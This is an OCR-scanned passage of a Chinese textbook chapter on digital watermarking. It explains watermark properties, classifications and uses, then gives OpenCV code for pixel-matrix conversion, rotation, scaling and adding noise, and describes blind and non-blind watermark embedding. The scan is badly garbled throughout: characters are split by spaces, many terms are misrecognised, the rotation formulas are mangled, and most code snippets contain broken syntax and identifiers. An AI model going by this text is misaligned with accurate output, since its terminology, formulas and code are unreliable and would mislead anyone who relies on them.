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水 印信 号 检测 模型 是 用 来 判断 某 一 数据 中 是 否 含有 指定 的 水 印信 号 ,如 图 8-3 所 示 。 
检测 阶段 主要 是 设计 一 个 对 应 于 嵌入 过 程 的 检测 算法 。 检 测 的 结果 用 来 判断 是 否 存在 原水 
印 ,检测 方案 的 目标 是 使 错 判 与 漏 判 的 概率 尽量 小 。 提 取 时 需要 采用 密 钥 ,只 有 掌握 密 钥 的 
人 才能 读 出 水 印 。 
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图 8-2 数字 水 印 找 入 模型 图 8-3 数字 水 印 提取 模型 


数字 水 印 应 该 具有 和 鲁 棒 性 、 唯 一 性 \` 不 可 见 性 等 要 求 ,还 要 能 够 抵抗 一 些 正常 的 数据 处 
理 和 恶意 的 攻击 。 

(1) 鲁 棒 性 : 是 指 水 印信 息 能 够 抵抗 应 用 过 程 中 的 各 种 破坏 程度 。 例 如 对 信息 的 传 
输 、 压 缩 、 滤 波 、 几 何 变换 等 处 理 后 ,数字 水 印 不 会 被 破坏 , 仍 能 从 数字 信息 中 提取 出 水 印信 
息 。 与 此 相反 ,脆弱 性 水 印 用 于 完整 性 保护 的 水 印 , 当 内 容 发 生 改变 时 水 印信 息 会 发 生 相应 
的 改变 ,从 而 可 以 鉴定 原始 数据 是 否 被 算 改 。 

(2) 水 印 容量 : 是 指 载体 在 不 发 生 形 变 的 前 提 下 可 嵌入 的 水 印信 息 量 。 水 印信 息 必须 
足以 表示 多 媒体 内 容 的 创建 者 或 所 有 者 的 标志 信息 或 购买 者 的 序列 号 ,这 样 有 利于 解决 版 
权 纠 纷 。 水 印 容量 和 和 鲁 棒 性 是 相互 矛盾 的 ,水 印 容量 的 增加 会 带 来 鲁 棒 性 的 下 降 , 鲁 棒 性 不 
好 就 会 导致 检测 结果 的 不 可 靠 。 

(3) 安全 性 : 是 指 加 入 水 印 和 检测 水 印 的 方法 对 没有 授权 的 第 三 方 应 是 绝对 保密 
的 ,难以 算 改 或 伪造 ,不 可 轻易 破解 。 数 字 水 印 系统 一 般 使 用 一 个 或 多 个 密 钥 来 确保 水 
印 安全 。 

(4) 自 恢复 性 : 是 指数 字 水 印 在 原始 数据 经 过 较 大 的 破坏 或 变换 后 , 仍 能 从 原 数据 中 
恢复 出 隐藏 的 水 印 。 

(5) 不 可 见 性 : 对 不 可 感知 的 数字 水 印 来 说 ,是 指数 字 信 息 加 入 水 印 后 不 会 改变 其 感 
知 效果 , 即 看 不 到 数字 水 印 的 存在 。 


8.2.2 数字 水 印 分 类 


(1) 按 水 印 的 可 见 性 ,可 分 为 可 见 水 印 和 不 可 见 水 印 。 可 见 水 印 的 主要 目的 是 明确 标 
识 版 权 ,防止 非法 的 使 用 。 可 见 水 印 应 不 特别 掩盖 其 下 的 图 像 细 节 , 是 难以 擦 除 的 ; 不 可 见 
水 印 的 目的 是 为 了 将 来 起 诉 非法 使 用 者 ,作为 起 诉 的 证 据 , 以 增加 起 诉 非法 使 用 者 的 成 功 
率 ,保护 原创 造 者 和 所 有 者 的 版 权 。 不 可 见 水 印 往往 用 在 商业 用 的 高 质量 图 像 上 ,而 且 往 往 
配合 数据 解密 技术 一 同 使 用 。 

人 民 币 上 存在 以 下 可 见 水 印 : 

四 黑 水 印 , 即 水 印 部 分 比较 厚 ,在 自然 光 下 ,水 印 图 文部 分 比 水印 纸 的 其 他 部 分 颜色 
深 。 最 典型 的 例子 是 : 第 五 版 人 民 币 100 元 和 50 元 在 水 印 窗 位 置 有 毛泽东 头像 黑 水 印 ; 
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10 元 上 有 玫瑰 花 的 黑 水 印 。 

@ 白水 印 , 自 然 光 下 ,水印 图 文部 分 比 纸 的 其 他 部 分 厚度 小 ,颜色 浅 。 例 如 ,第 五 版 100 元 和 
50 元 人 民 币 左下 角 100 和 50 数字 旁 的 数字 50、100 白水 印 。 

@ 固定 水 印 , 水 印 图 文 固定 在 纸张 的 固定 位 置 , 典 型 例子 : 第 五 版 10 元 ,20 元 人 民 币 
在 水 印 窗 位 置 有 固定 花卉 水 印 。 

@ 满 版 水 印 , 水 印 图 文 分 布 于 纸张 的 满 版 例子 : 我 国 第 三 、 四 版 的 5 元 .2 元 及 1 元 人 
民 币 上 的 满 版 古 钱 水 印 和 满 版 五 角 星 。 

(2) 按 水 印 的 特性 ,可 分 为 鲁 棒 (稳健 ) 数 字 水 印 和 脆弱 ( 易 损 ) 水 印 。 重 棱 水 印 主要 
用 于 在 数字 作品 中 标识 著作 权 信息 ,嵌入 创建 者 或 所 有 者 的 标识 信息 ,或 购买 者 的 标识 
( 即 序列 号 )。 发 生 版 权 纠 纷 时 ,创建 者 或 所 有 者 的 信息 用 于 标识 数据 的 版 权 所 有 者 ,而 
序列 号 用 于 追踪 违反 协议 而 为 盗版 提供 多 媒体 数据 的 用 户 。 用 于 版 权 保护 的 数字 水 印 
要 求 有 很 强 的 鲁 棒 性 和 安全 性 ,除了 在 一 般 图 像 处 理 中 能 够 生存 外 ,还 需 能 抵抗 一 些 恶 
意 攻击 。 

脆弱 水 印 主要 用 于 完整 性 保护 ,应 对 一 般 图 像 处 理 有 较 强 的 免疫 能 力 , 同 时 又 要 求 有 较 
强 的 敏感 性 , 即 既 允许 一 定 程度 的 失真 又 要 能 将 失真 情况 探测 出 来 。 必 须 对 信号 的 改动 很 
敏感 ,根据 水 印 的 状态 可 以 判断 数据 是 否 被 算 改 。 

(3) 按照 水 印 的 载体 ,可 分 为 图 像 水 印 ,视频 水 印 .音频 水 印 .文本 水 印 数据库 水 印 、 印 
刷 水 印 等 。 

(4) 按照 检测 方法 ,可 分 为 明 水 印 和 讶 水印。 根据 提取 水 印 是 否 需 要 原始 图 像 可 将 水 
印 分 为 明 水 印 和 盲 水 印 两 种 。 明 水 印 在 检测 过 程 中 需要 原始 数据 ,而 盲 水 印 的 检测 只 需要 
密 钥 , 不 需要 原始 数据 。 一 般 来 说 , 明 水 印 的 鲁 棒 性 比较 强 , 但 其 应 用 受到 存储 成 本 的 限制 。 
目前 学 术 界 研究 的 数字 水 印 大 多 数 是 讶 水印 。 

(5) 按照 内 容 , 可 分 为 内 容 水 印 和 标志 水 印 。 内 容 水 印 是 指 水 印 本 身 也 是 某 个 数字 图 
像 ( 如 商标 图 像 ) 或 数字 音频 片段 的 编码 ; 标志 水 印 则 只 对 应 于 一 个 序列 号 。 

内 容 水 印 的 优势 在 于 ,如 果 由 于 受到 攻击 或 其 他 原因 致使 解码 后 的 水 印 破损 ,人 们 仍然 
可 以 通过 视觉 观察 确认 是 否 有 水 印 。 但 对 于 标志 水 印 来 说 ,如 果 解 码 后 的 水 印 序 列 有 若干 
码 元 错误 , 则 只 能 通过 统计 决策 来 确定 信号 中 是 否 含有 水 印 。 

(6) 按照 用 途 , 可 分 为 版 权 保 护 水 印 、 票 据 防伪 水 印 、 身 份 认证 水 印 , 算 改 提示 水 印 和 隐 
藏 标识 水 印 等 。 

版 权 标 识 水 印 是 目前 研究 最 多 的 一 类 数字 水 印 。 数 字 作品 既是 商品 又 是 知识 作品 ， 
这 种 双重 性 决定 了 版 权 标识 水 印 主要 强调 隐藏 性 和 和 鲁 棒 性 ,而 对 数据 量 的 要 求 相 对 
较 小 。 

票证 防伪 水 印 是 一 类 比较 特殊 的 水 印 , 主 要 用 于 打印 票据 和 电子 票据 、 各 种 证 件 的 
防伪 。 算 改 提示 水 印 是 一 种 脆弱 水 印 , 其 目的 是 标识 原文 件 信 号 的 完整 性 和 真实 性 。 隐 
藏 标识 水 印 的 目的 是 将 保密 数据 的 重要 标注 隐藏 起 来 ,限制 非法 用 户 对 保密 数据 的 
使 用 。 

(7) 按 数字 水 印 的 隐藏 位 置 , 可 分 为 时 ( 空 ) 域 数字 水 印 . 频 域 数 字 水 印 、. 时 / 频 域 数字 水 
印 和 时 间 / 尺 度 域 数字 水 印 。 

时 ( 空 ) 域 数字 水 印 是 直接 在 信号 空间 上 和 加 水 印信 息 ,而 频 域 数字 水 印 、. 时 / 频 域 数字 
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水 印 和 时 间 / 尺 度 域 数 字 水 印 则 分 别 是 在 离散 余弦 变换 域 , 时 / 频 变 换 域 和 小 波 变换 域 上 隐 
藏 水 印 。 随 着 数字 水 印 技术 的 发 展 ,各 种 水 印 算法 层出不穷 ,水 印 的 隐藏 位 置 也 不 再 局 限于 
上 述 4 种。 应 该 说 ,只 要 构成 一 种 信号 变换 ,就 有 可 能 在 其 变换 空间 上 隐藏 水 印 。 


8.2.3 数字 水 印 的 应 用 


(1) 数字 作品 知识 产权 保护 。 数 字 作品 的 所 有 者 可 用 密 钥 产生 一 个 数字 水 印 , 并 将 其 
嵌入 原始 数据 ,然后 公开 发 布 其 水 印 版 本 作品 ,从 而 防止 其 他 团体 对 该 作品 宣称 拥有 版 权 。 
当 该 作品 被 盗版 或 出 现 版 权 纠纷 时 ,所 有 者 可 利用 一 定 方法 从 盗版 作品 或 含水 印 的 作品 中 
获取 数字 水 印 作为 版 权 所 有 依据 ,从 而 保护 所 有 者 的 权益 。 

用 作 此 目地 的 水 印 要求 具 有 良好 的 鲁 棒 性 。 

(2) 商务 交易 中 的 票据 防伪 。 随 着 高 质量 图 像 输入 输出 设备 的 发 展 ,特别 是 高 精度 彩 
色 喷 墨 、 激 光 打印 机 和 高 精度 彩色 复印 机 的 出 现 , 使 得 货币 、 支 票 以 及 其 他 票据 的 伪造 变 得 
更 加 容易 。 传 统 商 务 向 电子 商务 转化 的 过 程 中 ,大 量 过 渡 性 的 电子 文件 (如 各 种 纸 质 票据 的 
扫描 图 像 等 ) ,需要 一 些 非 密码 的 认证 方式 。 数 字 水 印 技术 可 以 为 各 种 票据 提供 不 可 见 的 认 
证 标志 ,从 而 大 大 增加 了 伪造 的 难度 。 

(3) 证 件 防伪 。 

(4) 算 改 提示 。 当 数字 作品 被 用 于 法 庭 、 医 学 、 新 闻 及 商业 时 , 常 需 要 确定 它们 的 内 容 
是 否 被 修改 .伪造 或 特殊 处 理 过 。 为 实现 该 目的 ,通常 可 将 原始 图 像 分 成 多 个 独立 的 块 ,再 
将 每 个 块 加 入 不 同 的 水 印 。 同 时 可 通过 检测 每 个 数据 块 中 的 水 印信 号 ,来 确定 作品 的 完 
整 性 。 

与 其 他 用 途 水 印 不 同 的 是 ,这 类 水 印 必 须 是 脆弱 的 ,并 且 检 测 水 印信 号 时 ,不 需要 原始 
数据 。 

(5) 声 像 数 据 的 隐藏 标识 和 自 改 提示 。 数 据 的 标识 信息 往往 比 数据 本 身 更 具有 保密 价 
值 ,标识 信息 在 原始 文件 上 是 看 不 到 的 ,只 有 通过 特殊 的 阅读 程序 才 可 以 读 取 。 这 种 方法 已 
经 被 国外 一 些 公开 的 还 感 图 像 数 据 库 所 采用 。 现 有 的 信号 拼接 和 灸 嵌 技 术 可 以 做 到 移 花 接 
木 而 不 为 人 知 ,数据 的 算 改 提示 通过 隐藏 水 印 的 状态 可 以 判断 声 像 信 号 是 否 被 算 改 。 

(6) 隐藏 通信 及 其 对 抗 。 利 用 数字 化 声 像 信号 相对 于 人 的 视觉 .听觉 元 余 , 可 以 进行 各 
种 时 ( 空 ) 域 和 变换 域 的 信息 隐藏 ,从 而 实现 隐藏 通信 。 

(7) 使 用 控制 。 这 种 应 用 的 一 个 典型 的 例子 是 DVD 防 复制 系统 ,即将 水 印信 息 加 入 
DVD 数据 中 ,这 样 DVD 播放 机 即 可 通过 检测 DVD 数据 中 的 水 印信 息 而 判断 其 合法 性 和 
可 复制 性 。 从 而 保护 制造 商 的 商业 利益 。 

(8) 标题 与 注释 ”即将 作品 的 标题 .注释 等 内 容 ( 如 ,一 幅 照 片 的 拍摄 时 间 和 地 点 等 ) 以 
水 印 形式 嵌入 该 作品 中 ,这 种 隐 式 注释 不 需要 额外 的 带宽 , 且 不 易 丢 失 。 


8.3 图 像 数字 水 印 


图 像 数 字 水 印 是 以 图 像 作为 数字 水 印 载体 的 数字 水 印 , 即 数字 水 印 的 载体 要 求 是 图 像 ， 
但 谋 和 人 的 数字 水 印 形式 上 可 以 是 文字 、 字 符 串 ,当然 也 可 以 仍 是 图 像 。 在 实际 工作 中 ,图 像 
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数字 水 印 以 图 像 作为 数字 水 印 的 居多 。 

数字 水 印 的 主要 功能 是 标识 图 像 版 权 所 有 者 ,进行 图 像 版 权 保护 。 

图 像 版 权 保护 者 需要 保证 含水 印 载体 图 像 进行 正常 图 像 处 理 后 不 会 破坏 水 印 图 像 的 正 
确 提 取 , 经 图 像 盗 版 者 各 种 攻击 后 仍 能 准确 提取 出 水 印 图 像 ; 图 像 盗版 者 为 了 逃避 法 律 制 
裁 , 则 会 对 含水 印 载体 图 像 进行 各 种 攻击 ,试图 达到 破坏 水 印 图 像 正确 提取 的 目的 。 两 者 的 
技术 对 抗 必 将 长 期 存在 ,相互 促进 ,不 断 发 展 。 

图 像 数 字 水 印 通过 保密 水 印 图 像 嵌 入 位 置 , 提 高 水 印 嵌 入 算法 的 鲁 棒 性 ,公开 含水 印 载 
体 图 像 实现 图 像 版 权 保护 ,预防 盗版 者 破坏 图 像 数 字 水 印 ; 盗版 者 通过 不 断 改进 攻击 方法 , 破 
坏 从 含水 印 载体 图 像 中 正确 提取 水 印 图 像 , 从 而 减轻 自己 的 罪责 ,逃避 法 律 制裁 。 


8.3.1 数字 图 像 操作 


1. 图 像 与 图 像 像素 矩阵 的 相互 转换 

如 图 8-4 所 示 ,数字 图 像 是 一 个 二 维 像素 数组 (和 矩阵) 。 黑 白 二 值 图 像 对 应 数组 每 个 元 
素 只 能 取 0( 黑 ) 或 1( 白 ) 两 个 值 ,如 图 8-5 所 示 ; 灰 度 图 像 对 应 二 维 数组 每 个 元 素 实 可 取 
0( 黑 ) 一 255( 白 ) 中 任意 一 个 值 ,表示 256 个 灰 度 级 ; 彩色 图 像 被 认为 是 R.G、B 3 个 颜色 通 
道 对 应 二 维 数组 的 合成 ,每 个 数组 可 取 0 一 255 中 的 任意 一 个 值 ,3 个 数组 至 加 实现 一 幅 彩 
色 图 像 。 





8-4 ”黑白 二 值 图 像 


Open CV 中 提供 evGet2DO 〇 和 cvSet2DO 〇 两 函数 实现 图 像 与 图 像 像 素 和 矩阵 的 相互 转换 。 
(1) IplImage 结构 体 是 opencv 定义 的 图 像 数 据 结构 ,其 基本 属性 如 下 : 


int nSize; /* IplImage 大 小 */ 

int ID; /* 版 本 (=0)*/ 

int nChannels; /* 通道 数 , 取 值 为 1.2. 3 或 4x*/ 

int depth; /* 像素 的 位 深度 , x / 

int dataOrder; /* 0 - 交叉 存 取 颜色 通道 , 1 - 分 开 的 颜色 通道 * / 
int width; /* 图 像 宽 ,单位 :像素 (px) */ 

int height; /* 图 像 高 ,单位 :像素 (px) * / 


int imageSize; /* 图 像 数据 大 小 ,单位 : 字 节 x* / 
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(2) cvGet2D 函数 : 
CvScalar cvGet2D( const CvRrrx arr, int idx0, int idxl ); 


功能 : 获取 IplImage 图 像 中 某 个 像素 的 RGB 颜色 值 , 对 灰 度 图 像 获 取 灰 度 值 。 
arr: 一 个 具体 的 图 像 , 如 IplImage 的 实例 对 象 ; 

idx0: 图 像 的 y 坐标 ,单位 为 像素 (px); idxl: 图 像 的 x 坐标 ,单位 为 像素 (px); 
返回 值 为 一 个 CvScalar 容器 ,代表 一 个 像素 位 置 的 RGB 颜色 值 。 

(3) cvSet2D 函数 


CVAPI(void) cvSet2D( CvArr * arr, int idx0, int idxl, CvScalar value ); 


功能 : 设置 IplImage 图 像 中 某 个 像素 的 RGB 颜色 值 ,对 灰 度 图 像 设置 灰 度 值 ; 

value: CvScalar 容器 的 一 个 实例 化 对 象 。 

图 像 到 图 像 像素 矩阵 的 转换 : 使 用 两 个 for 循环 嵌 套 ,遍历 图 像 的 每 一 个 像素 ,用 
cvGet2D() 得 到 该 像素 点 颜色 值 ,并 将 其 存 人 一 个 CvScalar 二 维 数组 ,就 可 实现 图 像 到 图 像 
像素 矩阵 的 转换 。 主 要 代码 如 下 : 

for (int i = 0; i< image.height(); i++) { 

for (int j] = 0; j < image.width(); j++) 
{CvScalar sl;sl = cvGet2D(image, i, j);...} } 

图 像 像素 矩阵 到 图 像 的 转换 : 使 用 两 个 for 循环 江 套 ,遍历 图 像 像素 箱 阵 ,用 cvSet2D 
() 将 图 像 对 应 像素 的 颜色 值 设置 成 CvScalar 数组 的 值 , 就 可 实现 图 像 像素 矩阵 到 图 像 的 转 
换 。 主 要 代码 如 下 : 

for(int i=0;i< image 1.height();i++){ 

for(int j=0;j< image 1.width();j++) 
{cvSet2D( image 1,i,j,s[i][j]); } } 

使 用 以 上 方法 就 可 实现 如 图 8-4 所 示 的 图 像 与 如 图 8-5 所 示 的 图 像 像素 矩阵 的 相互 转换 。 

2. 数字 图 像 旋 转 .缩放 .加 了 品 

数字 图 像 可 以 用 抢 阵 来 表示 ,因此 能 够 采用 矩阵 理论 和 和 矩阵 算法 对 数字 图 像 进行 分 析 和 
处 理 ,通过 对 像素 矩阵 进行 矩阵 运算 实现 图 像 旋转 ,效果 如 图 8-6 一 图 8-8 所 示 。 





图 8-6 载体 图 像 图 8-7 90" 旋 转 图 8-8 任意 角度 旋转 图 


(1) 图 像 旋转 : 将 图 像 像素 矩阵 进行 矩阵 变换 ,就 可 实现 图 像 旋 转 。 例 如 ,依次 将 如 
图 8-6 所 示 nXn 的 图 像 像素 矩阵 的 第 : 行 ( 王 1,2,…,7) 转 置 为 第 ”一 上 十 1 列 ,就 可 实现 图 
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像 顺 时 针 旋 转 90" ,生成 如 图 8-7 所 示 的 图 像 。 
实现 方法 为 通过 cvGet2D() 得 到 源 图 像 的 色彩 值 ,用 cvSet2D() 给 旋转 后 的 目标 图 像 
对 应 像素 位 置 赋值 。 顺 时 针 旋转 90" 的 主要 代码 如 下 : 


IplImage image_1 = IplImage. create( image. height ( )，image. width( )，IPL_DEPTH_8U，image. 
nChannels()); 


for (i = 0; i< image.height(); i++) 
{for (j = 0; j < image.width(); j++) 
{s= cvGet2D( image ,i ,j); cvSet2D(image 1,j,(h—-i—-1),s);} } 
类 似 可 实现 图 像 向 右 旋转 180" (水 平 翻转 )、 向 左旋 
转 90°。 
图 像 整数 倍 90" 角 的 旋转 比较 简单 ,任意 角度 的 旋转 
则 就 困难 一 些 。 例 如 将 图 8-6 旋转 为 图 8-8。 此 时 需要 根 
据 图 8-9, 推 导出 点 (zx,y) 绕 原点 逆 时 针 旋 转 到 (x ,y ) 的 
旋转 公 
“* tan(b)=y/z,tan(at+b)=y /rx, xrXr++ yXy = 
ZX Xz 十 y Xy( 圆 的 半径 相同 ) 





将 tan(6)= 二 y/z ,stan(a 二 ) 二 y /x 代入 tan(a 二 6b) = 图 8-9 旋转 公式 
( tan(a)t+tan(b) ) / (1—tan(a) Xtan(b) ) 
可 消除 参数 5b, 得 : 
tan(a)+y/z = y /x X(1—tan(a) Xy/z) 





“X=y Xz—ytan(a))/( ztan(a)t+y) 
将 上 式 代 入 xXz 十 yXy= 二 zx’ Xz 十 y Xy ,消除 参数 x ,化 简 得 ， 
y = zxsin(a)+ ycos(a), x = xrcos(a) 一 ysin(a) 

(2) 图 像 缩 放 : 图 像 放 大 后 ,需要 在 目的 图 像 中 插入 像素 ,增加 像素 数 ; 缩小 时 ,需要 对 
源 图 像 进行 像素 取样 ,减少 像素 数 。 两 者 都 会 导致 图 像 颜 色 过 渡 不 连续 ,因此 两 者 不 仅 需 要 
考虑 在 什么 位 置 增加 或 减少 像素 ,而 且 需 要 考虑 增加 或 减少 像素 如 何 与 周围 像素 颜色 过 渡 
连续 。 

经 典 的 图 像 的 缩放 算法 有 近邻 取样 插值 法 、 二 次 线性 插值 法 .三 次 线性 插值 法 等 。 

近邻 取样 插值 法 : 将 目标 图 像 各 点 的 像素 颜色 值 设 为 源 图 像 中 与 其 最 近 点 的 像素 颜 
色 值 。 假 设 源 图 像 宽度 和 高 度 分 别 为 w0 和 h0, 缩放 后 目标 图 像 的 宽度 和 高 度 分 别 为 
wl 和 hl, 那么 缩放 比例 就 是 float fw 二 float(w0)/wl; float fh = float(h0)/hl; 目标 图 
像 中 的 (x,y) 点 坐标 对 应 着 源 图 像 中 的 (x0, y0) 点 ,其 中 : x0 一 int(xx fw)，y0 一 int 
(yx* fh) 。 

通过 使 用 cvGet2D() 和 cvSet2D() 函 数 以 及 近邻 取样 插值 法 的 思想 就 可 实现 图 像 的 任 
意 比例 缩放 ,主要 代码 如 下 : 


IplImage image 1 = IplImage.createl(setX, setY, IPL DEPTH 8U, image.nChannels()); 


for(i=0;i<image 1 h;i++) 
{x = iximage h/image 1_h; 
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for(j=0;j< image 1 w;j++) 
{Y = jx image w/image 1 w;cvSet2D(image 1,i,j,cvGet2D(image,x,y));} } 


其 中 缩放 后 图 像 宽 、 高 为 setX、setY,image_1 存放 缩放 后 目标 图 像 , image 为 源 
图 像 。 

近邻 取样 插值 的 缩放 算法 直接 取 (S;,S,) 点 的 Color0 颜色 作为 缩放 后 点 的 颜色 ; 二 次 
线性 插值 需要 考虑 (Sx,， Sy) 点 周围 的 4 个 颜色 值 Color0\Colorl\Color2\Color3, 把 (S,， 
S,) 到 A、B、C\D 坐标 点 的 距离 作为 系数 来 把 4 个 颜色 混合 出 缩放 后 点 的 颜色 ,如 图 8-10 


所 示 。 
设 u=S. 一 floor(S); v= 二 S, 一 floor(S,); (floor 函数 的 返回 值 为 小 于 等 于 参数 的 最 大 


整数 ), 则 二 次 线性 插值 公式 为 : 


tmpColor0 = Color0O * (1—-u) + Color2*u;tmpColorl = Colorl* (1-u) + Color3*xu; 
DstColor = tmpColor0x (1—v) + tmpColor2x vi 


展开 公式 为 : 

pm0= (1-u)*(1-v) ;pnl=v* (1-u); pn2=ux* (1-v); pn3= uxv; 

则 颜色 混合 公式 为 : 

DstColor = Color0* pm0 + Colorl *pml + Color2 * pm2 + Color3* pm3; 


三 次 线性 插值 : 二 次 线性 插值 缩放 出 的 图 像 很 多 时 候 让 人 感觉 变 得 模糊 (术语 叫 低 通 
滤波 ) ,特别 是 在 放大 的 时 候 , 需 要 使 用 三 次 线性 插值 来 改善 插值 结果 。 

三 次 线性 插值 考虑 映射 点 周围 16(4X4) 个 点 的 颜色 来 计算 最 终 的 混合 颜色 ,如 图 8-11 
中 P00 所 在 像素 为 映射 的 点 ,加 上 它 周围 的 15 个 点 , 按 一 定 系数 混合 得 到 最 终 输 出 


结果 。 
区 , 
(Ss,) -FE PO-1 |P1-1 |P2-1 区 
(Color0) | (Color?2) P-10| P00 | P10 | P20 


B D 
Pl | Pol P11 | P21 




















(Colorl) | (Color3) Pi2| Po P12 | P22 
| | 























图 8-10 二 次 线性 插值 图 8-11 三 次 线性 插值 


对 载体 图 像 ( 见 图 8-6) 缩 放 后 可 得 到 图 8-12。 

(3) 图 像 加 品 : 图 像 的 加 噪 是 指 在 图 像 表 面 加 上 随机 的 噪点 ,加 噪 分 为 椒盐 噪声 和 高 
斯 噪声 。 

如 图 8-13 所 示 ,椒盐 噪声 是 指 两 种 噪声 : 一 种 是 盐 噪 声 (salt noise) , 另 一 种 是 胡椒 噪 
声 (pepper noise) 。 盐 一 白色 , 椒 一 黑色 。 前 者 是 高 灰 度 噪声 ,后 者 属于 低 灰 度 噪 声 。 一 般 
两 种 噪声 同时 出 现 , 呈 现在 图 像 上 就 是 黑白 杂 点 。 
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图 8-12 图 像 缩放 图 8-13 图 像 加 噪 


实现 时 ,首先 使 用 for 循环 和 cvGet2D() 将 图 像 转化 为 图 像 像素 矩阵 ,然后 在 图 像 像素 
矩阵 的 随机 位 置 设置 NX(1 一 snr) 个 颜色 值 为 (255,255.255) 的 白 点 ,其 中 N 为 原 图 的 大 
小 (widthXhight, 也 是 图 像 的 像素 点 个 数 ) ,snr 为 信 噪 比 ( 取 值 为 0 一 1) ,最 后 将 加 噪 后 的 图 
像 像素 矩阵 转换 为 图 像 输 出 显示 。 主 要 代码 如 下 : 


double SNR= 0.9;int num= (int)(wx*hx (1— SNR)); 
for(int i=0;i<num;i++){ 
int row = (int) (Math. random( ) * (double)h) ;int 
col = (int) (Math. random() * (double)w); 
A[row][col][0] = 255;A[row][col][1] = 255;A[row][col][2] = 255;} 
for(int i=0;i<h;i++){ 
for(int j=0;j<w;j++){ 
sl. setval(0, A[i][j][0]); sl. setval(1, A[i][j][1]); 
s1. setVal(2, A[i][j][2]); cvSet2D(image 0,i,j,s1);} } 


对 载体 图 像 ( 见 图 8-6) 加 品 后 可 得 到 图 8-13。 
8.3.2 ” 盲 水 印 嵌入 提取 


图 像 数字 水 印 是 指 将 水 印 图 像 采用 数字 内 艇 的 方式 隐藏 到 载体 图 像 的 技术 ,广泛 应 用 
于 数字 资源 版 权 保护 、 信 息 隐 藏 .票据 防伪 等 多 个 领域 。 
图 像 数 字 水 印 嵌 入 实现 原理 为 两 个 数字 图 像 像素 矩阵 的 某 种 运算 ,如 图 8-14 所 示 。 





129 128 126 125 … 





图 8-14 ”数字 水 印 嵌入 原理 
图 像 数字 水 印 戏 入 提取 的 难点 为 : 
(1) 数字 水 印 嵌入 位 置 的 随机 选择 。 数 字 水 印 嵌 入 位 置 的 随机 性 可 实现 水 印 嵌 入 的 不 
可 见 性 ,破坏 水 印 图 像 的 内 在 联系 ,增加 攻击 者 破坏 水 印 的 难度 ; 
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(2) 如 何 实现 数字 水 印 对 常规 图 像 操作 (旋转 、 缩 放 \ 加 噪 等 ) 的 鲁 棒 性 ,保证 水 印 能 够 
在 含水 印 图 像 受到 攻击 后 仍 能 正确 提取 ,实现 数字 水 印 的 可 用 性 。 

数字 水 印 戏 入 位 置 的 选择 .嵌入 提取 方法 多 种 多 样 ,需要 根据 实际 工程 需要 选择 。 

按照 提取 检测 过 程 划分 ,数字 水 印 可 分 为 明 水 印 和 盲 水 印 。 明 水 印 在 检测 过 程 中 需要 
原始 数据 ,而 盲 水 印 的 检测 不 需要 原始 数据 。 

言 水 印 在 载体 图 像 中 的 嵌入 实质 是 在 载体 图 像 的 基础 上 覆盖 水 印 图 像 。 实 现 方法 是 将 
载体 图 像 嵌 入 位 置 颜色 值 设置 成 水 印 图 像 对 应 位 置 的 颜色 值 , 从 而 达到 水 印 覆 盖 的 效果 。 
盲 水 印 的 特点 是 在 嵌入 时 直接 将 水 印 图 像 嵌 入 到 载体 图 像 内 部 ,提取 时 直接 从 含水 印 载体 
图 像 内 提取 出 水 印 图 像 ,水 印 图 像 在 嵌入 和 提取 时 都 不 需要 进行 额外 的 运算 处 理 。 如 在 载 
体 图 像 ( 见 图 8-6) 左 上 和 角 嵌 入 水 印 图 像 ( 见 图 8-15) 可 得 如 图 8-16 所 示 的 含 育 水 印 图 像 。 
图 8-17 为 对 图 8-15 加 噪 后 的 图 像 。 

盲 水 印 通常 都 是 可 见 水 印 ,主要 功能 是 明确 标示 载体 图 像 版 权 所 有 者 。 

盲 水 印 的 提取 是 盲 水 印 嵌入 的 逆 过 程 。 正 常 的 图 像 处 理 (合理 的 缩放 旋转、 加 噪 ) 不 会 
破坏 数字 水 印 的 正确 提取 ,如 图 8-18 和 图 8-19 所 示 。 从 图 8-17 中 仍然 可 以 提取 出 如 图 8-20 
所 示 的 数字 水 印 。 








图 8-15 水 印 图 像 图 8-16 含 言 水 印 图 像 图 8-17 加 了 噪 水 印 图 像 


兰州 峙 | 
交友 时 芝 


图 8-18 缩放 提取 图 8-19 旋转 提取 图 8-20 加 噪 提取 





随 着 图 像 处 理 程度 的 增加 ,合理 的 操作 也 会 转变 为 对 图 像 的 破坏 ,成 为 一 种 攻击 方式 。 
观察 表 8-1 可 知 : 当 加 噪 比例 超过 一 定 值 后 ,提取 的 水 印 将 不 能 有 效 识别 。 

因此 操作 比例 阔 值 的 选取 是 一 个 重要 的 问题 。 我 们 一 方面 需要 不 断 改进 已 有 数字 水 印 
嵌入 提取 算法 ,增加 阔 值 ; 另 一 方面 也 应 该 看 到 数字 水 印 保护 版 权 的 作用 也 具有 局 限 性 , 需 
要 其 他 方法 的 辅助 。 
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表 8-1 不 同 加 噪 比例 提取 水 印 图 像 比 较 
加 噪 比 例 0% 5% 10% 15% 





水 印 图 像 





提取 水 印 




















汉 明 距离 6 33 67 82 


在 信息 论 中 ,两 个 等 长 字符 串 之 间 的 汉 明 距离 是 两 个 字符 串 对 应 位 置 的 不 同 字符 的 个 
数 。 换 句 话说 , 它 就 是 将 一 个 字符 串 变换 成 另外 一 个 字符 串 所 需要 替换 的 字符 个 数 。 例 如 
1011101 与 1001001 之 间 的 汉 明 距离 是 2; 2143896 与 2233796 之 间 的 汉 明 距离 是 3; 
"toned" 与 "roses" 之 间 的 汉 明 距离 是 3。 

两 个 图 像 的 汉 明 距离 是 两 个 图 像 像 素 和 矩阵 对 应 位 置 不 同 字符 的 个 数 , 可 用 来 比较 两 个 
图 像 的 相似 程度 。 汉 明 距 离 越 小 ,两 个 图 像 越 相 似 。 

表 8-1 计算 了 提取 水 印 与 水 印 图 像 ( 见 图 8-15) 的 汉 明 距离 ,需要 注意 的 是 ,即使 没有 对 
含水 印 图像 进 行 任何 处 理 ( 加 品 比 例 0%), 提 取水 印 也 会 和 水 印 图 像 有 差异 。 


8.3.3 了 明 水 印 嵌 入 提取 


明 水 印 指 在 水 印 嵌 入 时 ,将 水 印 图 像 与 载体 图 像 进行 运算 ,将 运算 结果 嵌入 到 载体 图 像 
内 部 。 提 取水 印 图 像 时 ,通过 对 含水 印 载体 图 像 和 原始 载体 图 像 的 运算 ,将 水 印 图 像 从 含水 
印 的 载体 图 像 内 提取 出 来 。 

如 图 8-21 所 示 , 明 水 印 通过 水 印 图 像 与 载体 图 像 的 运算 实 
现 水 印 图 像 的 不 可 见 性 ,完成 了 水 印信 息 隐 藏 。 明 水 印 破坏 了 
水 印 图 像 颜色 间 的 相关 性 ,更 加 难以 发 现 ,去 除 , 水 印 的 安全 性 
更 高 。 
